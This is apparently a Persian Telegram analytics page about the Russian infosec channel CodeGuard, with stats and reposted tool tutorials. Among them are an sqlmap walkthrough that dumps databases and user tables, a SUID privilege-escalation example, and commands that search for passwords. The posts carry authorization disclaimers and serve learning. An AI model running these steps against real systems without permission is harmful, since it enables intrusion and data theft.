CodeGuard: CyberSec Edition
Канал по ИБ и этичному хакингу. Связь: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
نمایش بیشتر📈 تحلیل کانال تلگرام CodeGuard: CyberSec Edition
کانال CodeGuard: CyberSec Edition بازیگری فعال است. در حال حاضر جامعه شامل 12 346 مشترک است و جایگاه 10 284 را در دسته فناوری و برنامهها و رتبه 53 489 را در منطقه روسيا دارد.
📊 شاخصهای مخاطب و پویایی
از زمان ایجاد در невідомо، پروژه رشد سریعی داشته و 12 346 مشترک جذب کرده است.
بر اساس آخرین دادهها در تاریخ 13 ژوئن, 2026، کانال فعالیت پایداری دارد. در ۳۰ روز گذشته تغییر اعضا برابر 368 و در ۲۴ ساعت گذشته برابر 3 بوده و همچنان دسترسی گستردهای حفظ شده است.
- وضعیت تأیید: تأیید نشده
- نرخ تعامل (ER): میانگین تعامل مخاطب 12.59% است و در ۲۴ ساعت نخست پس از انتشار، محتوا معمولاً 6.03% واکنش نسبت به کل مشترکان کسب میکند.
- دسترسی پستها: هر پست به طور میانگین 1 555 بازدید دریافت میکند. در اولین روز معمولاً 745 بازدید جمعآوری میشود.
- واکنشها و تعامل: مخاطبان بهطور فعال حمایت میکنند؛ میانگین واکنش به هر پست 4 است.
- علایق موضوعی: محتوا بر موضوعات کلیدی مانند codeguard, pysec, docker, grep, контейнер تمرکز دارد.
📝 توضیح و سیاست محتوایی
نویسنده این فضا را محل بیان دیدگاههای شخصی توصیف میکند:
“Канал по ИБ и этичному хакингу.
Связь: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
به لطف بهروزرسانیهای پرتکرار (آخرین داده در تاریخ 14 ژوئن, 2026)، کانال همواره بهروز و دارای دسترسی بالاست. تحلیلها نشان میدهد مخاطبان بهطور فعال با محتوا تعامل دارند و آن را به نقطه اثرگذاری مهم در دسته فناوری و برنامهها تبدیل کردهاند.
➡️ Свежие CVE и уязвимости ➡️ Новости взломов и утечек ➡️ Аналитика и обзоры ➡️ Подкасты и интервью с экспертамиПочему читать: Один из немногих русскоязычных ресурсов, который оперативно переводит западные разборы и добавляет свои кейсы. Бонусный раздел — «Блоги»: Практикующие пентестеры делятся техниками, скриптами и опытом. 😈 CodeGuard: PySec Edition | Чат
sudo apt install lynis
Запуск аудита:
sudo lynis audit system
Что проверяет:
⚫️Пароли и учётные записи ⚫️Права на файлы (/etc, /var, /tmp) ⚫️Сетевые настройки (SSH, firewall, открытые порты) ⚫️Логирование и доступ к логам ⚫️Наличие бэкдоров и rootkitПример вывода:
[+] SSH — рекомендовано использовать ключи вместо паролей [!] /tmp не смонтирован с nodevФикс проблем:
sudo lynis audit system --quick
sudo lynis audit system --fix
🔥 Бонус: Lynis даёт готовый совет по каждой найденной проблеме.
😈 CodeGuard: PySec Edition | Чатgit clone https://github.com/lanmaster53/recon-ng
cd recon-ng
pip install -r REQUIREMENTS
./recon-ng
Базовый кейс:
marketplace install all
workspace create target_company
modules load recon/domains-hosts/bing_domain_web
set source company.com
run
🔥 Кейс: Осинтер получил доступ к Jenkins, когда модуль recon/domains-hosts/hackertarget нашёл скрытый поддомен jenkins.company.com, а recon/contacts-contacts/mailtester подтвердил email техподдержки. Атака через забытый поддомен — самый частый путь.
💡 Совет: Запускайте через прокси.
😈 CodeGuard: PySec Edition | Чатdocker pull ghcr.io/prowlrbot/cybersandbox
😈 CodeGuard: PySec Edition | Чатfind / -name "config.php" 2>/dev/null
2. Искать в файлах (grep)
grep -r "password" /home/
3. Сетевая диагностика
netstat -tulpn
4. Просмотр живых логов
tail -f /var/log/syslog
5. Убить процесс по имени
pkill -f "python evil.py"
6. Права SUID (для повышения привилегий)
find / -perm -4000 2>/dev/null
7. История команд
history | grep nmap
8. Зашифровать файл
gpg -c secret.txt
9. Расшифровать файл
gpg secret.txt.gpg
10. Освободить RAM
echo 3 > /proc/sys/vm/drop_caches
Сохраняйте.
😈 CodeGuard: PySec Edition | Чат🔵Как AiTM-фишинг обходил MFA мейнтейнеров 🔵Почему proof of concept такого червя создали ещё 10 лет назад 🔵Как защитить свои проекты от supply chain-атакИдеально для разработчиков, DevOps и всех, кто работает с open-source. 😈 CodeGuard: PySec Edition | Чат
owasp.org/www-project-juice-shop
Как начать:
docker pull bkimminich/juice-shop
docker run -d -p 3000:3000 bkimminich/juice-shop
Открыть http://localhost:3000
😈 CodeGuard: PySec Edition | Чатgit clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
Шаг 2. Базовое сканирование
python sqlmap.py -u "https://target.com/page?id=1"
Шаг 3. Забираем базы данных
python sqlmap.py -u "https://target.com/page?id=1" --dbs
Шаг 4. Забираем таблицы
python sqlmap.py -u "https://target.com/page?id=1" -D имя_бд --tables
Шаг 5. Дамп таблиц
python sqlmap.py -u "https://target.com/page?id=1" -D имя_бд -T users --dump
Важно: Только на своих системах или с разрешения. За несанкционированный доступ — уголовная статья.
😈 CodeGuard: PySec Edition | Чатfind / -perm -4000 2>/dev/null
Проверка на уязвимые известные бинарники:
text
find / -perm -4000 2>/dev/null | grep -E "nmap|vim|find|bash|less|more"
Пример эксплуатации (на своих виртуалках):
/usr/bin/find /etc/passwd -exec whoami \;
Если результат root — вы повысили привилегии.
Что делать для защиты: Убирать SUID с ненужных файлов через chmod u-s /path/to/file
😈 CodeGuard: PySec Edition | Чат🔵Что под ударом: Zyxel NAS, DSL-роутеры, точки доступа. Список: NAS326, NAS542, NWA50AX, WAC500 и другие. 🔵Где искать: Проверьте сайт Zyxel, загрузите ваш IP в поисковик по модели. 🔵Что искать: Пользователи zyfwp, Printer, MFT. В логах SSH — подозрильные входы с незнакомых IP.Как защититься: Обновите прошивку до версии с патчем. Если нет обновления — отключите удалённый доступ к админке. 😈 CodeGuard: PySec Edition | Чат
github.com/qeeqbox/social-analyzer)
Установка:
git clone https://github.com/qeeqbox/social-analyzer
cd social-analyzer
npm install
Запуск: npm start → открыть http://localhost:9000
🔥 Кейс: OSINT-специалист искал угрозы в компании. Забил ник тестировщика из чата поддержки — обнаружил, что тот же логин использовался на форуме по продаже базы клиентов. Нарушителя уволили до утечки.
💡 Совет: Запускайте через VPN, чтобы не спалить IP.
😈 CodeGuard: PySec Edition | Чат🔵Перехват и модификация запросов/ответов на лету 🔵Работа через консоль (mitmproxy) или веб-интерфейс (mitmweb) 🔵Скриптование на Python 🔵Поддержка HTTP/2, WebSocket, gRPCБыстрый старт:
pip install mitmproxy
mitmweb
Важно: Использовать только на своих устройствах или с разрешения владельца.
😈 CodeGuard: PySec Edition | Чат➡️Злоумышленник обманывает процессор, подсовывая фальшивый чип SPD, который врёт о размере памяти. Это создаёт «двойников» физических адресов и позволяет читать зашифрованную память гостевой VMПочему опасно: Атака работает на серверах AMD EPYC (3-е и 4-е поколения) с памятью DDR4/DDR5. Учёные подтвердили, что под ударом AMD SEV-SNP . Что делать: AMD выпустила обновления прошивки. Используйте модули памяти с заблокированным SPD и обновите BIOS 😈 CodeGuard: PySec Edition | Чат
netstat -tulpn # слушающие порты netstat -tupan # все соединенияss (быстрее):
ss -tulpn # слушающие порты ss -t state established # только активные🔴 Красные флаги: порты 4444, 1337, 6667, процессы с именами
evil.py, reverse.
Убить процесс: kill -9 [PID]
Сохраняйте.
😈 CodeGuard: PySec Edition | Чат
اکنون در دسترس! پژوهش تلگرام ۲۰۲۵ — مهمترین بینشهای سال 
